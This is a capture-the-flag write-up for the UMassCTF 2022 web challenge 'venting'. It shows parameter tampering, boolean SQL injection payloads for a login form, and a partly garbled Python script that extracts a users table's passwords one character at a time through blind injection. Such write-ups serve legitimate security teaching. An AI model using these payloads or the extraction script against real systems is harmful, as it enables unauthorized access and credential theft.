Rating: 5.0
# UMassCTF 2022 - venting
- Write-Up Author: Tarn
- Flag: UMASS{7H35U55Y1MP0573rCr4CK57H3C0D3}
## **Question:**
>Challenge description
Hmmmm. This website is kinda sus... Can you become the imposter and vent towards the flag?
## Write up
This is the simple website with some input fields.

When I look at the GET request, there is one parameter for verifying admin. I change the admin parameter from False to True.

Great, then I get into another redirect URL

It looks like Auth bypass, therefore I try some SQL injection payloads and find the result is different.
user=' or 1 or 0='1&pass=111

user=' or 0 or 0='1&pass=111

This is the hints that I can guess the user password by checking the True or False on SQL query.
Finally I write the script to come out the whole password.
import requests
url = ''
def get_table():
flag = ''
for i in range(1, 500):
low = 32
high = 126
mid = (low+high)//2
while low < high:
#payload = f"' or (substr((select sqlite_version()),{i},1)>char({mid})) or 0='1" admin/
payload = f"' or (substr((select group_concat(Password) from users),{i},1)>char({mid})) or 0='1"
data = {
url_t = url
r = requests.post(url=url_t,data=data)
if 'Invalid login' in r.text:
high = mid
if "You'll never log in" in r.text:
low = mid + 1
mid = (low+high)//2
if low == high:
flag = flag + chr(low)
Bingo! The password is the flag.

> UMASS{7H35U55Y1MP0573rCr4CK57H3C0D3}